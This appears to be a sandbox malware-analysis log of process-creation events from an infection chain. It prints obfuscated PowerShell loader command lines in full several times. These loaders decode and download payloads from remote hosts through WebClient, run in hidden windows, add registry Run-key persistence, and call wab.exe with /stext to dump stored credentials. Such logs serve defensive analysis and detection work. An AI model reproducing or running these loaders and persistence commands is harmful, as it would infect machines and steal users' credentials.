Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belinda103.Eft && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belinda103.Eft && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bilateralities" /t REG_EXPAND_SZ /d "%Arrestationernes110% -w 1 $Faucals83=(Get-ItemProperty -Path 'HKCU:\sttyskers\').talevant;%Arrestationernes110% ($Faucals83)"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bilateralities" /t REG_EXPAND_SZ /d "%Arrestationernes110% -w 1 $Faucals83=(Get-ItemProperty -Path 'HKCU:\sttyskers\').talevant;%Arrestationernes110% ($Faucals83)"
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	Process created: C:\Windows\SysWOW64\srdelayed.exe "C:\Windows\SysWOW64\srdelayed.exe"
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	Process created: C:\Windows\SysWOW64\relog.exe "C:\Windows\SysWOW64\relog.exe"
Source: C:\Windows\SysWOW64\relog.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Negligent.Gas && echo t"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$Ovg	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Negligent.Gas && echo t"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Andragendet8.vbs"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nywdnxhzquvbdzxsrjdoxzvr"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nywdnxhzquvbdzxsrjdoxzvr"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\yakooqrtecnnfflwatqqaeiadgh"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iupgoicvskfsqlharedrlrcrlmrxexz"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belinda103.Eft && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS 